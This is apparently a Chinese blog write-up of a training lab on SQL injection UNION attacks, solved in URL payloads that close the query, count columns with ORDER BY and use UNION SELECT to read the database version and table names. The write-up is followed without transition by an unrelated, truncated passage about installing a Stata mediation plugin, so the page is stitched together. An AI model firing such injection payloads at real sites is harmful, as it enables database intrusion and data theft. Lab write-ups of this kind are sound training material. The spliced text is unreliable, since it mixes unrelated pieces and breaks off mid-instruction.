Lab8_ SQL injection UNION attack, finding a column containing text

前言:

实验室标题为:

SQL 注入 UNION 攻击,查找包含文本的列

等级:执业者

简介:

本实验室的产品类别过滤器中存在 SQL 注入漏洞。查询结果会在应用程序的响应中返回,因此可以使用 UNION 攻击从其他表中获取数据。要构建这种攻击,首先需要确定查询返回的列数。您可以使用在以前的实验室中学到的一种技术来实现这一点。下一步是确定与字符串数据兼容的列。

本实验将提供一个随机值,您需要让该值出现在查询结果中。要解决该实验问题,请执行 SQL 注入 UNION 攻击,返回包含所提供值的附加行。此技术可帮助您确定哪些列与字符串数据兼容。

进入实验室

页面显示为商店页面

构造 payload

尝试闭合

单引号+注释符,页面返回正常

and 1=2 判断

https://xxxxx/filter?category=Gifts' and 1=2 --

and 1=1 页面返回正常,and 1=2 页面返回空白,说明存在 SQL 注入

order by 排序

https://xxxxxx/filter?category=Gifts' order by 3 --

order by 3 页面返回正常,说明有 3 列数据

union 联合查询

https://xxxxx/filter?category=Gifts' and 1=2 union select null,'aaaa',1111  --

经过测试可知存在两个可见输出点,可以利用的输出点只有第二个为字符串类型,第三个输出点位数字型

查看版本

https://xxxxx/filter?category=Gifts' and 1=2 union select null,version(),1111  --

接着获取表名

https://xxxxx/filter?category=Gifts' and 1=2 union select null,table_name,1111 from information_schema.tables --

但是该实验室的目的并不是获取表种的数据

在页面上方提供了一个字符串’PFm4Oy’

在简介中提到,本实验将提供一个随机值,需要让该值出现在查询结果中

修改 payload

https://xxxxx/filter?category=Gifts' and 1=2 union select null,'PFm4Oy',1111 --

此时显示成功通关

"sgmediation.zip" 是一个包含 UCLA(加利福尼亚大学洛杉矶分校)开发的 sgmediation 插件的压缩包。该插件专为统计分析软件 Stata 设计,用于进行中介效应分析。在社会科学、心理学、市场营销等领域,中介效应分析是一种关键的统计方法,它帮助研究人员探究变量之间的因果关系,尤其是中间变量如何影响因变量与自变量之间的关系。Stata 是一款广泛使用的统计分析软件,具备众多命令和用户编写的程序来拓展其功能,sgmediation 插件便是其中之一。它能让用户在 Stata 中轻松开展中介效应分析,无需编写复杂代码。 下载并解压 "sgmediation.zip" 后,需将解压得到的 "sgmediation" 文件移至 Stata 的 ado 目录结构中。ado(ado 目录并非“adolescent data organization”缩写,而是 Stata 的自定义命令存放目录)目录是 Stata 存放自定义命令的地方,应将文件放置于 "ado\base\s" 子目录下。这样,Stata 启动时会自动加载该目录下的所有 ado 文件,使 "sgmediation" 命令在 Stata 命令行中可用。 使用 sgmediation 插件的步骤如下:1. 安装插件:将解压后的 "sgmediation" 文件放入 Stata 的 ado 目录。如果 Stata 安装路径是 C:\Program Files\Stata\ado\base,则需将文件复制到 C:\Program Files\Stata\ado\base\s。2. 启动 Stata:打开 Stata,确保软件已更新至最新版本,以便识别新添加的 ado 文件。3. 加载插件:启动 Stata 后,在命令行输入 ado update sgmediation,以确保插件已加载并更新至最新版本。4
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值